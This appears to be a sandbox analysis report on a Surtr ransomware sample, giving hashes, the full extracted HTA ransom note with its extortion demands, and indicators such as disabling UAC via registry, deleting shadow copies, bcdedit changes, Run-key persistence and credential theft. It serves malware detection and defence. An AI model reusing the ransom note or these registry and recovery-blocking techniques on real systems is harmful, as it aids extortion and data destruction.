surtr | 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

Resubmissions

01-01-2025 00:01

250101-aay9eawncs 10

31-12-2024 23:46

241231-3sc34swjct 10

Analysis

max time kernel
442s
max time network
443s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
01-01-2025 00:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
Size

320KB
MD5

e6fc190168519d6a6c4f1519e9450f0f
SHA1

af2080ddf1064fb80c7b9af942aaabf264441098
SHA256

8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA512

4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
SSDEEP

6144:Q4K8rYBWqjbqL7busNWGl3GDmm+miR9zrmkdAZ:Q46QKbQJNDl3cmgiRlK

Score

10^/10

surtr credential_access defense_evasion evasion execution impact persistence ransomware spyware stealer trojan upx

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\SURTR_README.hta

Ransom Note

<!DOCTYPE html><html lang="en"> <head> <meta http-equiv="x-ua-compatible" content="ie = 9"> <meta name="viewport" content="width = device-width, initial-scale = 1.0"> <title>SurtrRansomware</title> <HTA:APPLICATION ID="SurtrRansomware" APPLICATIONNAME="SurtrRansomware" icon=explorer.exe scroll=no contextmenu=no innerBorder=no windowState=maximize minimizeButton=no singleInstance=yes sysMenu=no VERSION="1.0" WINDOWSTATE="maximize"/> </head><style>@import url('https://fonts.googleapis.com/css2?family=Didact+Gothic&display=swap');@import url('https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.css');body { overflow: hidden; font-family: 'Didact Gothic', sans-serif; color:#333; box-sizing: border-box; }* { box-sizing: border-box; }a { text-decoration: none;}header { background-color: #f2f2f2; height: 90px; }nav { width: 960px; margin: 0 auto; display: flex; justify-content: space-between;}.logo { width: 100px;}.logo img { width: 100px; }.lang-menu { width: 100px; text-align: right; font-weight: bold; margin-top: 25px; position: relative;}.lang-menu .selected-lang { display: flex; justify-content: space-between; line-height: 2; cursor: pointer;}.lang-menu .selected-lang:before { content: ''; display: inline-block; width: 32px; height: 32px; background-image: url(https://www.countryflags.io/us/flat/32.png); background-size: contain; background-repeat: no-repeat;}.lang-menu ul { margin: 0; padding: 0; display: none; background-color: #fff; border: 1px solid #f8f8f8; position: absolute; top: 45px; right: 0px; width: 125px; border-radius: 5px; box-shadow: 0px 1px 10px rgba(0,0,0,0.2);}p{ display: -webkit-box; display: -ms-flexbox; display: inline; -webkit-box-pack: start; -ms-flex-pack: start; justify-content: flex-start; }.lang-menu ul li { list-style: none; text-align: left; display: flex; justify-content: space-between;}.lang-menu ul li a { text-decoration: none; width: 125px; padding: 5px 10px; display: block;}.lang-menu ul li:hover { background-color: #f2f2f2;}.lang-menu ul li a:before { content: ''; display: inline-block; width: 25px; height: 25px; vertical-align: middle; margin-right: 10px; background-size: contain; background-repeat: no-repeat;}.de:before { background-image: url(https://www.countryflags.io/de/flat/32.png);}.en:before { background-image: url(https://www.countryflags.io/us/flat/32.png);}.fr:before { background-image: url(https://www.countryflags.io/fr/flat/32.png);}.ar:before { background-image: url(https://www.countryflags.io/ae/flat/32.png);}.lang-menu:hover ul { display: block;}i { color: #dc143c; font-style: normal;}td{ font-size: 1.4rem; }@media only screen and (max-width: 1370px) { td{ font-size: 1rem; } h1.ex1 { font-size:1.2rem !important; } p.ex2{ font-size:1rem !important; } p.ex3{ font-size:1.4rem !important; } h1#noticefirst{ font-size:1.5rem !important; } } </style> </style> <body> <div style="margin-left: 60px; margin-right: 60px; margin-top:20px;"> <div style="display: inline; "> <p class="ex3" style="border-left: 6px solid rgb(255, 55, 55); font-size: 40px; background-color: rgb(255, 255, 255); padding-left: 10px; color: rgb(88, 88, 88); "><strong >SurtrRansomware</strong> </p> </div> <div style="width: 100%; border-radius: 4px; margin-top: 10px; border-style: solid; border-color: rgb(255, 78, 78); border-width: 0.5px; text-align: center; background-color: rgb(255, 249, 249); "> <h1 style="font-size: 1.8rem; margin-left: 10px; "> OOPS ALL YOUR <b style="color: #fff; background-color: rgb(248, 26, 26); padding: 4px; font-size: 1.8rem; ">IMPORTANT FILES</b> HAVE BEEN ENCRYPTED AND <b style="color: #fff; background-color: rgb(248, 26, 26); padding: 4px; font-size: 1.8rem; ">STOLEN !!</b></h1> </div> <h1 id="noticefirst" > Notice : There is only one way to restore your data read the boxes carefully! </h1> <div style="width: 100%; border-radius: 4px; border-style: solid; position: relative; border-color: rgb(248, 26, 26); border-width: 0.5px 0.5px 0.5px 25px; background-color: rgb(255, 227, 227); padding-top: 1%; padding-bottom: 1%; "> <div style="width: 100%; margin-top: -7px;"> <h1 class="ex1" style=" margin-bottom: 7px; margin-top: 0px; margin-left: 10px; font-size:1.8rem; color: #000; ">Attention :</h1> </div> <div style="width: 48%; display: inline-block; position: absolute; right : 0; "> <div style=" height:100%; margin-left: 15px; "> <table > <tbody> <tr> <td style="text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; " width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong> Do Not change file names.</strong></td> </tr> <tr style="height: 56px; "> <td style=" text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; " width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong>Do Not try to decrypt using third party softwares , it may cause permanent data loss .</strong></td> </tr> <tr> <td style=" text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; " width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong> If you do not pay the fee within one month , your important files will be published in our public belog .</strong></td> </tr> </tbody> </table> </div> </div> <div style="width: 48%; display: inline-block; "> <div style=" height:100%; margin-left: 15px; "> <table > <tbody> <tr> <td style=" text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; " width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong> Do not pay any money before decrypting the test files.</strong></td> </tr> <tr style="height: 56px; "> <td style=" text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; "width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong> You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled.</strong></td> </tr> <tr > <td style=" text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; " width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong> In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation .</strong></td> </tr> </tbody> </table> </div> </div> </div> <div style="width: 100%; border-radius: 4px; margin-top: 5px; "> <div style="width: 100%; display: flex; flex-direction: column; border-style: solid; padding top: 1%; padding-bottom: 1%; border-color: #4d53eb; border-width: 0.5px 0.5px 0.5px 25px; border-radius: 4px; background-color: #f3f3fc; " > <div><h1 class="ex1" style=" margin-bottom: 7px; margin-top: 0px; margin-left: 10px; font-size:1.6rem; color: #000; ">How To Decrypt :</h1></div> <div style=" height:100%; margin-left: 15px; "> <table style="table-layout: fixed; "> <tbody> <tr> <td style=" text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; " width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong> Your system is offline . in order to contact us you can email this address <i> [email protected] </i> use this ID (<i style="color: #dc143c; " >WJVoydoUbR7cjA</i>) for the title of your email .</strong></td> </tr> <tr style="height: 56px; "> <td style=" text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; " width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong> If you weren't able to contact us within 24 hours please email : <i > [email protected] </i></strong></td> </tr> <tr> <td style=" text-align: center; color: #dc143c; padding: 0px; vertical-align: middle; " width="20">☢</td> <td style=" text-align: left; padding: 0px; vertical-align: middle; " ><strong> If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible </i></strong></td> </tr> </tbody> </table> </div> </div> </div></body></html>

Emails

[email protected]

URLs

http-equiv="x-ua-compatible"

Signatures

Detects Surtr Payload 45 IoCs

resource	yara_rule
behavioral2/memory/2844-4-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-3-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-32-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-29-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-28-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-27-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-24-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-31-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-26-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-23-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-7-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-5-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-34-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-35-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-36-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-39-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-41-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-43-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-45-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-47-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-49-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-50-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-52-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-54-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-58-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-57-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-56-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-55-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-53-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-51-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-48-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-46-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-44-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-42-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-40-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-38-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-37-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-121-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-120-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-119-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-118-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-117-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-116-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-5565-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral2/memory/2844-10562-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr

Surtr
Ransomware family first seen in late 2021.
ransomware surtr
Surtr family
surtr

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
4700	bcdedit.exe
5424	bcdedit.exe

Renames multiple (9896) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\L:	vssadmin.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\O:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\Y:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\A:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\W:	vssadmin.exe
File opened (read-only)	\??\K:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\Z:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\Z:	vssadmin.exe
File opened (read-only)	\??\P:	vssadmin.exe
File opened (read-only)	\??\I:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\M:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\X:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\P:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\T:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\V:	vssadmin.exe
File opened (read-only)	\??\E:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\H:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\O:	vssadmin.exe
File opened (read-only)	\??\S:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\R:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\L:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\V:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\W:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\B:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\N:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\G:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\J:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\N:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\Q:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\U:	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened (read-only)	\??\T:	vssadmin.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2720 set thread context of 2844	2720	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	84

UPX packed file 48 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2844-0-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-1-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-2-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-4-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-3-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-32-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-29-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-28-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-27-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-24-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-31-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-26-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-23-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-7-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-5-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-34-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-35-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-36-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-39-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-41-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-43-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-45-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-47-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-49-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-50-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-52-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-54-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-58-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-57-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-56-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-55-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-53-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-51-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-48-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-46-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-44-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-42-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-40-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-38-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-37-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-121-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-120-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-119-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-118-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-117-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-116-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-5565-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral2/memory/2844-10562-0x0000000140000000-0x0000000140136000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019VL_MAK_AE-ul-oob.xrm-ms.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\ui-strings.js.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\sv-SE\tipresx.dll.mui.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\es\UIAutomationProvider.resources.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\ext\sunpkcs11.jar.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\zh-tw_get.svg.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-ae\ui-strings.js.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Web.DynamicData.Design.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-interlocked-l1-1-0.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Trial-pl.xrm-ms.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\System\msvcp100.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\es-ES\MSFT_PackageManagement.strings.psd1.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\codec\librtpvideo_plugin.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ui-strings.js.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\SearchEmail2x.png.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\ui-strings.js.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\api-ms-win-core-debug-l1-1-0.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\[email protected].[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\New-Fixture.Tests.ps1.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.IO.FileSystem.AccessControl.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\rename.svg.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
